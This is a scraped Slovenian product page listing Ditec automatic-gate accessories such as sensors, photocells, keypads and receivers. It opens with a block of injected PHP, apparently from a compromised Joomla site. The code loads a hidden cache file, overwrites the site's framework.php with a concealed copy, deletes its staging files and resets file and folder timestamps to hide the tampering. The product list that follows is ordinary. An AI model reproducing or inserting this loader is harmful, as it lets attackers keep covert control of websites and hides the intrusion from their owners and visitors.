$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Pripomočki

Pripomočki

Vsi Ditec-ovi proizvodi so narejeni tako, da kupcu nudijo varnost, nadzorovanje ter kontrolo nad njimi. Prav zato Vam ponujamo široko paleto izdelkov, ki so kompatibilni z vsemi sistemskimi komponentami ter najnovejšimi standardi.

PAS - področni senzorji

pas

Več ...

XEL 5 Selektivna ključavnica

xel5

Več ...

LAB 9 Magnetic loop detectors

lab9

Več ...

DMCS Programska oprema

dmcs

Več ...

XEL 22 Infra-rdeče fotocelice

xel_22

Več ...

AV Mehanično kabelsko navitje

av

Več ...

LAMP Utripajoča luč

lamp

Več ...

LAN 7 Sistem za razpoznavanje

lan7

Več ...

TEO L Kontrolna tipkovnica

teol

Več ...

LAN 60 Coin operated system

lan60

Več ...

COM Digitalni in krožni programerji

com

Več ...

XEL CA/CB Vertikalna stojala

xel_ca

Več ...

PPC2 Prenosni programer z LCD zaslonom

ppc2

Več ...

LAN 4 Digitalna tipkovnica

lan4

Več ...

BIXLR22 / BIXLR42 PCB sprejemnik

bix

Več ...

GOL Four-channel, four-function

gol

Več ...

XEL2 / LAB3 Infra-rdeče fotocelice

xel_2

Več ...

SOF - Varnostni robniki

sof

Več ...

BIX AL 433 MHz zunanji sprejemnik

bix_al

Več ...